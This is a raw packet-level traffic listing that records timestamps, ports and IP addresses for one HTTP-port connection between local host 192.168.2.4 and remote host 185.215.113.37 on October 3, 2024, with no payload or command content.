Oct 3, 2024 18:38:12.777964115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.994091988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.994172096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.994174004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.994208097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.994224072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.994261026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.995309114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.995342970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.995363951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.995398045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.995817900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.995879889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.995994091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.996032000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.996047974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.996081114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.997077942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.997143984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.997235060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.997282028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.997376919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.997427940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.997431993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.997482061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.997818947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.997870922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.117669106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.117760897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.117778063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.117796898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.117819071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.117850065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.118310928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.118341923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.118370056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.118386030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.118726969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.118762016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.118781090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.118808985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.119498014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.119553089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.119692087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.119750023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.120182991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.120217085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.120243073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.120260954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.121026039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.121083975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.121393919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.121428013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.121450901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.121473074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.122334957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.122370005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.122394085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.122417927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.123317003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.123358011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.123373985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.123404980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.123917103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.123950005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.123975039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.123994112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.124852896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.124890089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.124911070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.124938011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.125574112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.125607967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.125628948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.125643015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.125653982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.125688076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.483226061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.483273983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.483314037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.483609915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.483640909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.483655930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.483685970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.483695030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.484119892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.484153032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.484186888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.484373093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.485049963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.485085964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.485110044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.485141039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.485908031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.485943079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.485975981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.485975981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.485987902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.486035109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.486987114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.487021923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.487049103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.487063885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.488110065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.488145113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.488169909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.488745928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.488780022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.488782883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.488799095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.488830090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.489574909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.489609003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.489634037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.489661932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.490119934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.490154982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.490175962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.490189075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.490201950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.490236998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.491055012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.491087914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.491107941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.491137981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.491888046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.491920948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.491935968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.491955996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.491967916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.491997957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.492676020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.492710114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.492726088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.492743969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.492757082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.492779016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.492789030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.492821932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494036913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494071960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494095087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494105101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494121075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494153976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494823933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494858027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494872093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494894028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.494904995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.494941950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.496172905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.496206999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.496227026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.496239901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.496252060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.496274948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.496284962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.496321917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497112989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497148991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497170925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497180939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497198105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497229099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497831106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497865915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497889996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497900009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.497915030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.497946024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.498617887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.498653889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.498677969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.498699903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.499583006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.499618053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.499640942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.499665976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.499958038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.499994040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.500291109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.500924110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.500958920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.500974894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.501003027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.502053022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.502088070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.502108097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.502140045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.503443956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.503479004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.503501892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.503520012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.504208088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.504244089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.504265070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.504283905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.504298925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.504333973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.504791975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.504827023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.504851103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.504870892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.505321026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.505356073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.505373001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.505404949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.506023884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.506057978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.506083965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.506092072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.506104946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.506139994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.507287025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.507322073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.507342100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.507354975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.507374048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.507407904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.507411003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.507460117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508004904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508039951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508054972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508073092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508085012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508120060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508657932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508692980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508711100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508728027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.508743048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.508779049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.509191990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.509227037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.509243965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.509259939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.509274960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.509295940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.509300947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.509341002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510009050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510044098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510059118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510077953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510093927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510124922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510852098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510886908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510916948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510921001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.510941982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.510973930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.511790037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.511825085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.511852980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.511857986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.511873007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.511893988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.511905909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.511945009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.512656927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.512691021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.512716055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.512726068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.512741089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.512775898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.513742924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.513777971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.513802052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.513811111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.513828039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.513859034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.514589071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.514626026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.514652014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.514657974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.514673948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.514693975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.514708996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.514743090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.515609980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.515644073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.515676022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.515681982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.515693903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.515723944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.516522884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.516560078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.516585112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.516592979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.516604900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.516640902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.517462969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.517498016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.517523050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.517530918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.517549992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.517566919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.517580032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.517615080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.518409014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.518443108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.518469095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.518476009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.518491030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.518522024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.519332886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.519367933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.519396067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.519414902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.519418955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.519469976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.520243883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.520279884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.520293951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.520313025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.520328045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.520347118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.520361900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.520394087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.521173000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.521207094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.521222115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.521239996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.521573067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.522051096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.522085905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.522116899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.522125959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.522131920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.522171021 CEST	49730	80	192.168.2.4	185.215.113.37
